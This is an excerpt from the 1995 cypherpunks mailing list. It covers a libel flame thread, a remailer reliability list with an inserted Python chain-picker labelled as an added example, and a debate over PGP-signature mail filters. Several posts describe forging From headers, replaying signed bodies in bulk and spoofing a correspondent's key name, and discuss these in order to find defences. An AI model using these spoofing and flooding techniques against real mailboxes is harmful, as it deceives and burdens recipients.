    Virginia. I can see the tremendous empathy of these people for Cohen's
    cause. <g>

	As I mention above, getting a DA's attention on questionable
    slander, is a bit far-fetched!  Tactically, I would think Cohen would
    find it necessary to actually win a civil suit which clearly indicated
    there was not only slander, but there was a malicious conspiracy to
    discredit Cohen. 

	Until Cohen actually manages to score a civil victory, I believe
    he is dead in the water. 

	Cohen should probably include me in his action --my idea of 
    discrediting Dr. Fred was putting him in procmailrc. Dr. Frederick B. 
    Cohen became Fred Cohen so part of this thread (missing anything from
    all.net) bled through.  No more, so I will not even see any of the 
    falderol if Fred*Cohen is anywhere in the text.

On Sun, 24 Dec 1995, Brian Davis wrote:

> On Sun, 24 Dec 1995, attila wrote:
> 
> > On Sun, 24 Dec 1995, Brian Davis wrote:
> > 
> > > On Sat, 23 Dec 1995, Perry E. Metzger wrote:
> > > > > Fred Cohen writes to me in private:
> > > ...
> > > > 
> > > > Let's see.  I guess I would start by having the police confiscate the
> > > > toad.com computers because they are part of a criminal conspiracy to
> > > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > > I didn't realize that AI research was that far along.  Can someone point 
> > > me to the specs for the computer that can become a "part of a criminal 
> > > conspiracy"??
> > > 
> > > EBD
> > > 
> > > 
> > > > damage my reputation.  Criminal because of the recent changes in the
> > > > law that prohibit you from sending me information I don't want to get.
> > > > 
> > >
> > 	the basis of the seizure is for evidence collection.  then they
> >     take their sweet time scrounging the disks for evidence.  If no
> >     evidence is found, they give it back --eventually.  I saw one case go 
> >     by a couple years back where they were trying to make the computer an
> >     accessory to the crime (I dunno, maybe it was supposed to auto-dial
> >     and drop the dime --no that's in 18USC as failure to snitch!)
> 
> Much truth here, but not relevant to Dr. Fred's threat of a civil suit.  
> He can't have his attorneys just call the FBI to pick up toad's computer.
> 
> CoS's seizure of computers, while shameful, was based on a different 
> legal theory than the good Dr. can possibly allege. 
> 
> 
> EBD
> 
> 
> > 	of course, if there are drugs involved, they confiscate it as
> >     spoils of the criminal act and the equipment is impounded and
> >     eventually sold after conviction for the benefit of their slush funds. 
> > 
> > 	I would imagine you have seen plenty of the latter one in the
> >     Federal attorney's office. this also gets into the issues of private
> >     cryptography and that _everybody_ should give up privacy protection,
> >     first amendment rights, etc. so uncle can catch a few dopers, gun 
> >     runners, and other assorted malcreants [sic] --like the difference 
> >     between {mis,mal}feasance: in both cases you get fucked, but 'mal' is
> >     intentional... 
> > 
> >  
> > > Not a lawyer on the Net, although I play one in real life.
> > >
> >     hey, at least you admit you're having a good time!
> > 
> > > **********************************************************
> > > Flame away! I get treated worse in person every day!!
> > > 
> >     
> > 
> > --
> > --------------------------------------------------------------------
> > #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
> > $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
> > 2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
> > pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)
> > 
> > 
> > 
> 
> Not a lawyer on the Net, although I play one in real life.
> **********************************************************
> Flame away! I get treated worse in person every day!!
> 

--
--------------------------------------------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 25 Dec 1995 23:11:22 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199512251450.GAA06781@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: all of the "ek" tags have been verified correct. Apologies to
those who were inconvenienced by incorrect "ek" tags in the past.

Last update: Mon 25 Dec 95 6:45:54 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hacktic  remailer@utopia.hacktic.nl       ***+*+******     7:48  99.98%
c2       remail@c2.org                    -+++++++.-++  1:29:45  99.96%
replay   remailer@replay.com              ******+*****     9:47  99.95%
portal   hfinney@shell.portal.com         .#**+#######    11:36  99.94%
bsu-cs   nowhere@bsu-cs.bsu.edu           #*#-####*#+#    12:47  99.91%
rmadillo remailer@armadillo.com           ++ +++++++++    39:31  99.89%
shinobi  remailer@shinobi.alias.net       ++--_.--++++  4:25:47  99.88%
alumni   hal@alumni.caltech.edu           -+*++##+###*    15:14  99.86%
ford     remailer@bi-node.zerberus.de     .-+++++-+-++  4:08:57  99.85%
flame    remailer@flame.alias.net         ***+**++.--   5:58:46  99.75%
hroller  hroller@c2.org                   -##+####.-##    47:58  99.75%
spook    remailer@valhalla.phoenix.net    * *+* **.--+  3:44:23  99.69%
vishnu   mixmaster@vishnu.alias.net       #*++*** ---   1:19:08  99.68%
tjava    remailer@tjava.com                          #      :23  99.48%
mix      mixmaster@remail.obscura.com     +-+++____.-  20:55:03  99.27%
extropia remail@extropia.wimsey.com       -.-.-----.   14:54:08  99.16%
wmono    wmono@valhalla.phoenix.net       * *+*   * **    13:17  98.94%
amnesia  amnesia@chardos.connix.com       ----- --++-   3:09:50  98.65%
penet    anon@anon.penet.fi               _....-.--- * 13:40:31  98.35%
gondolin mix@remail.gondolin.org          --____.-*+   18:46:33  96.41%
rahul    homer@rahul.net                  *#++***-+##*    21:00  99.97%
ecafe    cpunk@remail.ecafe.org           -####**-#       27:03  65.05%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
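
A reader for the listing format above, as an added example that is not premail's or the pinging service's code: it parses the `$remailer{...}` lines, the operator groups and the uptime table, then picks a chain by capability and uptime. Refusing to put two remailers from one operator group in the same chain is this example's own policy, and `parse_listing` and `pick_chain` are hypothetical names.

```python
import re

# Excerpt of the listing in the message above (the full list has more entries).
LISTING = r'''
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)
hacktic  remailer@utopia.hacktic.nl       ***+*+******     7:48  99.98%
c2       remail@c2.org                    -+++++++.-++  1:29:45  99.96%
replay   remailer@replay.com              ******+*****     9:47  99.95%
portal   hfinney@shell.portal.com         .#**+#######    11:36  99.94%
bsu-cs   nowhere@bsu-cs.bsu.edu           #*#-####*#+#    12:47  99.91%
alumni   hal@alumni.caltech.edu           -+*++##+###*    15:14  99.86%
flame    remailer@flame.alias.net         ***+**++.--   5:58:46  99.75%
hroller  hroller@c2.org                   -##+####.-##    47:58  99.75%
vishnu   mixmaster@vishnu.alias.net       #*++*** ---   1:19:08  99.68%
ecafe    cpunk@remail.ecafe.org           -####**-#       27:03  65.05%
'''

ENTRY = re.compile(r'''^\$remailer\{(["'])([\w-]+)\1\}\s*=\s*(["'])<([^>]+)>\s*(.*?)\3;$''')
GROUP = re.compile(r"^\(([\w\s-]+)\)$")
# name, address, 12-day history (may contain blanks), latency, uptime
ROW = re.compile(r"^([\w-]+)\s+(\S+@\S+)\s+.*?\s*(\d*(?::\d+)+)\s+(\d+(?:\.\d+)?)%$")


def to_seconds(latency):
    """Convert 'h:mm:ss', 'm:ss' or ':ss' to seconds."""
    total = 0
    for part in latency.split(":"):
        total = total * 60 + int(part or 0)
    return total


def parse_listing(text):
    """Return ({name: info}, [set of names sharing a machine or operator])."""
    remailers, groups = {}, []
    for line in text.splitlines():
        line = line.strip()
        m = ENTRY.match(line)
        if m:
            name, addr, caps = m.group(2), m.group(4), m.group(5).split()
            # "pgp." means: encrypt to the short name, not the full address.
            if "pgp." in caps:
                key_id = name
            else:
                key_id = addr if "pgp" in caps else None
            caps = {"pgp" if c == "pgp." else c for c in caps}
            remailers[name] = {"address": addr, "caps": caps, "key_id": key_id,
                               "uptime": None, "latency": None}
            continue
        m = GROUP.match(line)
        if m:
            groups.append(set(m.group(1).split()))
            continue
        m = ROW.match(line)
        if m and m.group(1) in remailers:
            info = remailers[m.group(1)]
            info["latency"] = to_seconds(m.group(3))
            info["uptime"] = float(m.group(4))
    return remailers, groups


def pick_chain(remailers, groups, need, length, min_uptime=99.0):
    """Greedy pick, best uptime first; never two hops from one operator group."""
    ranked = sorted(
        (n for n, r in remailers.items()
         if r["uptime"] is not None and r["uptime"] >= min_uptime
         and need <= r["caps"]),
        key=lambda n: (-remailers[n]["uptime"], n))
    chain, used = [], set()
    for name in ranked:
        mine = {i for i, g in enumerate(groups) if name in g}
        if mine & used:
            continue  # an operator already in the chain also runs this one
        chain.append(name)
        used |= mine
        if len(chain) == length:
            return chain
    raise ValueError("only %d suitable independent remailers" % len(chain))


if __name__ == "__main__":
    r, g = parse_listing(LISTING)
    print(pick_chain(r, g, {"cpunk", "pgp"}, 3))
```

Remailers with no row in the uptime table (here `alpha`) are never chosen, because nothing is known about their reliability.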




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Mon, 25 Dec 1995 23:20:54 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <901NgD5w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.951225065654.26785C-100000@netcom16>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:

> As I keep pointing out, pgp-signing the body is not enough.

	You're wrong.

	You can set up Procmail to detect if something is signed
	with PGP, and if it is, to run a script which determines
	the authenticity of the signature.  If the signature is
	not authentic, the message goes to /dev/null.  That way,
	even if Carol is using intercepted messages from Bob, Carol's
	messages won't be accepted or seen.

        xan

        jonathon
        grafolog@netcom.com


****************************************************************
	
	Opinions represented are not necessarily mine.

	OTOH, they are not representations of any organization 
	I am affiliated with, either.

	WebPage:	ftp://ftp.netcom.com/gr/graphology/home.html
	
          For a good prime, call 391581 * 2^216193 - 1

**********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Mon, 25 Dec 1995 20:56:50 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: [Rant] Flame threads and factual accuracy
In-Reply-To: <2.2b7.32.19951225030300.008f8cbc@mail.teleport.com>
Message-ID: <9512251230.AA25381@all.net>
MIME-Version: 1.0
Content-Type: text


Sorry to post this to the list.  I would normally only post it in
private to the sender, but since the sender has decided to speak without
listening I guess the only way to get the message back to them is by
indirect communication.  Will someone on the list please forward this
reply to the original sender on my behalf?

...
> Fred Cohen:
> 
> You have no respect for the freedom or opinions of others.  You expect the
> net to operate under your terms and under your rules.  You want people to be
> "responsible".

I know it's a lot to ask - being responsible - but I think it's the only way
cypherpunks will survive in the coming environment.

> From what I have read here that seems to mean "punishable".

With rights come responsibilities.  If you want the right of free speech, you
have to use it responsibly - otherwise, you will lose the right - and quite
possibly lose it for me as well.

> I do not like some of the flames I have seen, but I do not threaten legal action
> against them. You have.  I have met the keeper of the list.  He is a very
> nice guy and I would not want to see him go through hardship because of some
> whacko with a fascist control complex.

Since you don't know me, you have no idea of whether these statements
are true.  Put yourself in my place.  I posted no messages to the net
and yet I was publicly accused without any cause of doing things I did
not do by someone who knew that I didn't do them.  When I complained to
that person *in private* he published my personal mail to the list.  As
a result, you and others on the list are publicly calling me names like
a whacko with a fascist control complex.

It's not a matter of flames - it's a matter of intentionally and
maliciously perpetrating a falsehood about me in a manner and fashion
designed to damage my reputation.  That's different than voicing your
honest opinion and different than frivolous speech.  It's within your
freedom of speech to say a lot of senseless things - but it's not within
your freedom of speech to intentionally perpetrate damaging falsehoods
about other people.

Your name calling is so outrageous that nobody is likely to take you
seriously, and for that reason probably is not libelous - at least not
at the level you do it today, but what Perry did was something quite
different.  His statement could well be taken seriously - he has not
denied knowing that it was a falsehood - and it was clearly intended
to damage my reputation.

> Fred -- Go somewhere else.  I suggest you get together with Dan Gannon and
> his ilk.  I think you will find him more to your liking.  (Or maybe the
> $cientologists.  They are into suing anyone who disagrees with them. I am
> sure they will help you start a list with your control fetishes in mind.
> Maybe you can borrow a few of their lawyers.)

I have a better idea.  I have as much right to be here or anywhere else
as anyone in the world.  Anyone who says I don't could easily be accused
of being a "whacko with a fascist control complex", but I won't make
such accusations in public against you.  It is you who can't stand the
heat of openly discussing one of the central issues of cypherpunks -
responsibility and freedom relating to speech.  The reason you can't
stand serious conversation is because your position is unsupportable.

> BTW, Fred has been killfiled on my mailreader. I am sick of listening to the
> twit.  To understand what an honor this is...  He is the only person I have
> killfiled on this or any mailinglist.

People who close their minds to communication and choose to make one-way
proclamations doom themselves to ignorance.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 25 Dec 1995 21:26:56 +0800
To: cypherpunks@toad.com
Subject: Only accepting e-mail from known parties
In-Reply-To: <QQzvnv07234.199512242055@relay2.UU.NET>
Message-ID: <901NgD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


owner-cypherpunks@toad.com writes:
> Eric Murray wrote:
>
> | Where we're headed is mail filters with PGP imbedded (PGP 3 will
> | make this much easier) that check incoming mail for a valid signature
> | for certain PGP keyid/fingerprints and pass that mail along.
> | Other mail that doesn't match gets tossed into a 'junk' folder
> | or thrown away if you really don't want to talk to anyone that you
> | don't already know.
>
> I agree with the assessment of where we may be going, but the
> technology is available now.  (Marshall Rose uses it; if you want to
> get mail into his private mailbox, offer him some $ via imbedded FV
> authorizations in the mail, and it goes into his inbox.  If he thinks
> it was worth his time, he doesn't charge you.)
>
> Anyway, the code is definitely available now.  The back end is a
> little kludgy, but it was needed for an auto key retrieval script.
> This could easily be hacked to include a +pubring=$people line.  The
> script gives you a keyid, which you can then use to filter on, ie:
<shell script>

This is much better than nothing. This would stop the e-mail being
sent to everyone who's ever posted to Usenet. I see a couple of attacks:

1. Alice only accepts signed e-mail from Bob. Carol receives a signed e-mail
from Bob to Carol, sends 10,000 e-mails to Alice (via sendmail) with From: bob,
same body+signature, possibly varying message-ids and subjects.

2. Alice only accepts signed e-mail from Bob. Carol, a rogue sysadmin,
intercepts an e-mail from Bob to Alice, sends 10,000 more copies of it to Alice
(via sendmail) with From: bob, possibly varying message-ids and subjects.

As I keep pointing out, pgp-signing the body is not enough.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Mon, 25 Dec 1995 23:51:41 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
Message-ID: <13060E503DA@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Dec 95 at 7:45, Dr. Dimitri Vulis wrote:

[much on a pgp based gateway filter for email]
: 
: This is much better than nothing. This would stop the e-mail being
: sent to everyone who's ever posted to Usenet. I see a couple of attacks:
: 
: 1. Alice only accepts signed e-mail from Bob. Carol receives a signed e-mail
: from Bob to Carol, sends 10,000 e-mails to Alice (via sendmail) with From: bob,
: same body+signature, possibly varying message-ids and subjects.
: 
: 2. Alice only accepts signed e-mail from Bob. Carol, a rogue sysadmin,
: intercepts an e-mail from Bob to Alice, sends 10,000 more copies of it to Alice
: (via sendmail) with From: bob, possibly varying message-ids and subjects.
: 
: As I keep pointing out, pgp-signing the body is not enough.
: 

	Keep checksums of signatures (or body text) for a week, duplicate
messages are routed to /dev/null.

-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
You are lost in a maze of twisty little standards, all
different.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 26 Dec 1995 01:35:48 +0800
To: grafolog@netcom.com (Jonathan Blake)
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <Pine.SUN.3.91.951225065654.26785C-100000@netcom16>
Message-ID: <199512251710.JAA08899@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
> On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:
> 
> > As I keep pointing out, pgp-signing the body is not enough.
> 
> 	You're wrong.

He's right.

> 	You can set up Procmail to detect if something is signed
> 	with PGP, and if it is, to run a script which determines
> 	the authenticity of the signature.  If the signature is
> 	not authentic, the message goes to /dev/null.  That way,
> 	even if Carol is using intercepted messages from Bob, Carol's
> 	messages won't be accepted or seen.

Ok.  If I want to get my email ad for the Ronco turnip-twaddler past a filter
like that, all I need to do is to create a PGP key with
a user name that's the same as one that the victim already
receives.

i.e. if I know that joe@blort.com exchanges email with phred@none.net, then
I just create a PGP key with the name "phred@none.net", and sign
the turnip-twaddler ad with that.  It'd have a valid signature, and
one coming from Joe's friend phred.   Mail accepted.

In addition to checking for a valid signature, the filtering software
would have to also check the PGP key id of the key used.  It would
also need to make sure that there is ONLY PGP-signed content in the
mail.  Otherwise Mallet could grab an innocuous mail message that
Phred signed and include it at the bottom of the turnip-twaddler ad.
It wouldn't make sense (although that might be usual with Phred), but it'd
contain a valid signature from Phred, and therefore get the ad
past the filter.

I'm sure there's other caveats, these are just the ones I can think of now.



I wish all Cypherpunks a Merry Christmas.  I hope Santa brought you
all something nice, like a fast new stream cipher, a new key exchange
protocol, or maybe a note from the Fedz saying that ITAR has been lifted.
 

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Dec 1995 22:49:15 +0800
To: cypherpunks@toad.com
Subject: ROS_pig
Message-ID: <199512251432.JAA11244@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-25-95. NYPaper:

   "Fear Of Freedom: The urge to censor persists." Anthony
   Lewis column.

      The very essence of the on-line world is freedom. The
      effect of the "indecent" prohibition of the telecom bill
      will be to reduce all users of cyberspace to the level
      of children. That is exactly what Justice Felix
      Frankfurter found unconstitutional writing for the
      Supreme Court in 1957, about a Michigan law that banned
      sales to anyone of material unsuitable for children.
      "Surely," he wrote, "this is to burn the house to roast
      the pig."


   "Coming Soon to Computers Everywhere, a World's Fair." John
   Markoff.

      In an era when the Internet has become synonymous with
      commercialism and instant fortunes, Carl Malamud's
      commitment to public service has set him apart. Mr.
      Malamud maintains that there are still two ways to build
      the Internet. One is the high-stakes high-visibility
      route of initial public offerings in the stock market,
      the money-raising approach being pursued by people like
      Netscape Communication's founders, Jim Clark and Mark
      Andreessen. The other route, Mr. Malamud maintains, is by
      soliciting funds and building viable public works
      projects that benefit the common good.


   2 in 1: ROS_pig  (13k)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Tue, 26 Dec 1995 02:00:27 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <199512251710.JAA08899@slack.lne.com>
Message-ID: <Pine.SUN.3.91.951225091910.27577B-100000@netcom23>
MIME-Version: 1.0
Content-Type: text/plain



	Eric:

On Mon, 25 Dec 1995, Eric Murray wrote:

> > On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:

> Ok.  If I want to get my email ad for the Ronco turnip-twaddler past a filter
> like that, all I need to do is to create a PGP key with
> a user name that's the same as one that the victim already
> receives.
> 
> i.e. if I know that joe@blort.com exchanges email with phred@none.net, then
> I just create a PGP key with the name "phred@none.net", and sign
> the turnip-twaddler ad with that.  It'd have a valid signature, and
> one coming from Joe's friend phred.   Mail accepted.

	But will the signature match that of phred@none.net's PGP
	key?  I doubt it.

> In addition to checking for a valid signature, the filtering software
> would have to also check the PGP key id of the key used.  It would

	To check a signature, you need the public key the signature
	was created with.  You already have phred@none.net's public
	key on your keyring.  If that key does not demonstrate an
	authentic signature for the message, then the message is
	a fake.

	Now, if you assume that your keyring has been compromised,
	then you can also check the signatures of who signed the
	keys.  At a minimum, your signature should be on the authentic
	key.  If it is missing, then you can place the message in
	a "suspected to be forged bin", or just send it to dev/null,
	unread.

> also need to make sure that there is ONLY PGP-signed content in the
> mail.  Otherwise Mallet could grab an innocuous mail message that

	I hadn't thought of that, but here is one solution.

	Run a perl script that automatically deletes everything 
	that is not signed by pgp, with the exception of the date,
	the sender, and the subject line.  

> I'm sure there's other caveats, these are just the ones I can think of now.

	Let's figure out some more threat models.  And how to counter
	them.  

	Man in the middle --- he has your public key, joe@none.net's
	public key, and access to both your public ring, and
	joe@none.net public ring.   I don't know how to counter
	this one using filters with perl --- yet.

        xan

        jonathon
        grafolog@netcom.com


****************************************************************
	
	Opinions represented are not necessarily mine.

	OTOH, they are not representations of any organization 
	I am affiliated with, either.

	WebPage:	ftp://ftp.netcom.com/gr/graphology/home.html
	
          For a good prime, call 391581 * 2^216193 - 1

**********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Tue, 26 Dec 1995 02:33:58 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <X8BogD7w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.951225094550.27577E-100000@netcom23>
MIME-Version: 1.0
Content-Type: text/plain



	Dr Dimitri Vulis:

On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:

> Jonathan Blake <grafolog@netcom.com> writes:
> > On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote:
> >
> I'll be delighted if someone convinces me that I'm wrong about this.
> I may even start using PGP signatures. :)

	When I get the bugs out of the procmail script I'm
	writing, to accomplish this, I'll send it to you.

> I said, Carol can *forge* the RFC 822 header, so her e-mails look like they
> came from Bob, and use the body from Bob's authentic PGP-signed message.

	Strip out everything that is not header information, and is
	not signed with pgp. You could even strip out all header
	information, except for who sent the message.  That you need,
	so you know who to respond to.  

> The e-mail is sent by Carol, but the RFC 822 header says "From: Bob".
> If you think this is hard to accomplish, take a look, e.g., at the source

	Forged signatures are not that difficult to accomplish.

> The PGP-signed portion is copied verbatim from an authentic message.

	This is a good point.  

	However, won't most messages have the name of the intended
	recipient inside the PGP signature lines?

	Regardless, you've stated a weakness that I hadn't realized
	existed.  

> Alice _may_ notice that the _Received:_ headers are weird, but this
> forgery will certainly pass through a script that checks signatures.

	I'll have to give this some thought.  Have the script
	match the from id, with the message id.  << Not sure 
	how I can do this one, yet.  >>

> That's because PGP only signed a portion of the body, not the important
> headers like "Date:", "To:", "Subject:", and "Newsgroups:", nor the .sig.

	The Header won't be signed by PGP.  That part I will concede.
	The signature might be signed by PGP, depending on what one is
	using to read & respond to email with.  With SLMR can sign 
	signatures. << Granted, it is for DOS, and is geared towards 
	FidoNet conferences.  And I had to write a batch file to call
	the editor, then the program to attach the signature, then 
	sign the thing.  But the signature was included in the signed 
	part of the pgp message.  >>

        xan

        jonathon
        grafolog@netcom.com


****************************************************************
	
	Opinions represented are not necessarily mine.

	OTOH, they are not representations of any organization 
	I am affiliated with, either.

	WebPage:	ftp://ftp.netcom.com/gr/graphology/home.html
	
          For a good prime, call 391581 * 2^216193 - 1

**********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 26 Dec 1995 01:43:47 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <Pine.SUN.3.91.951225065654.26785C-100000@netcom16>
Message-ID: <X8BogD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


